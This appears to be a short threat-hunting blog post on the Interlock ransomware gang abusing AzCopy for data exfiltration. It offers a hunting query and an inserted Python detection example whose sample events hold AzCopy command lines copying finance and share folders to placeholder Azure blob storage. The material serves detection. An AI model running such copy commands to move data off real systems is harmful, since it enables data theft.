204. Interlock Ransomware Gang Abuse AzCopy for Data Exfiltration

Hello everyone!

Another legitimate tool abused by ransomware gangs - AzCopy. According to this cybersecurity advisory, the Interlock ransomware gang used the tool for data exfiltration.

The tool allows the adversary to copy files from compromised systems to remote Azure storage.

As the tool is legitimate, it's another great target for hunting, for example:

event_type: "processcreatewin" AND proc_file_path: "azcopy.exe"
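To show how that hunt behaves on real telemetry, here is an added example (not code from the post or the advisory) that runs the same logic over a few constructed process-creation events. It generalizes the exact-value match slightly: since proc_file_path usually holds a full path, it compares the file name component case-insensitively, so C:\Temp\AzCopy.EXE is caught as well. The event field names and the sample records are assumptions made for the demo.

```python
import ntpath

# Constructed sample events for the demo; the field names mirror the query in the post
# (event_type, proc_file_path) and are an assumption about the telemetry schema.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Users\jdoe\Downloads\azcopy.exe",
     "cmdline": r'azcopy.exe copy "C:\Finance" "https://PLACEHOLDER.blob.core.windows.net/c1?sv=PLACEHOLDER" --recursive'},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Temp\AzCopy.EXE",          # mixed case, different directory
     "cmdline": r'AzCopy.EXE sync "D:\Shares" "https://PLACEHOLDER.blob.core.windows.net/c2"'},
    {"event_type": "filecreate",                       # wrong event type, must not match
     "proc_file_path": r"C:\Tools\azcopy.exe",
     "cmdline": ""},
]


def is_azcopy_process(event: dict) -> bool:
    """Return True for Windows process-creation events whose image is azcopy.exe.

    Equivalent to: event_type: "processcreatewin" AND proc_file_path: "azcopy.exe",
    but matching on the base name so a full path or odd casing still hits.
    """
    if event.get("event_type") != "processcreatewin":
        return False
    image_name = ntpath.basename(event.get("proc_file_path", "")).lower()
    return image_name == "azcopy.exe"


def hunt(events: list) -> list:
    """Filter a list of events down to AzCopy executions worth triaging."""
    return [e for e in events if is_azcopy_process(e)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(f"AzCopy execution: {hit['proc_file_path']} | {hit['cmdline']}")
```

The two AzCopy events are returned; the svchost.exe event and the non-process event are not. When triaging a hit, the command line is the first thing to look at: the destination argument tells you where the data went.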

Talking about Interlock, it's worth noting another tool in their arsenal we discussed earlier - Interlock RAT.

See you tomorrow!
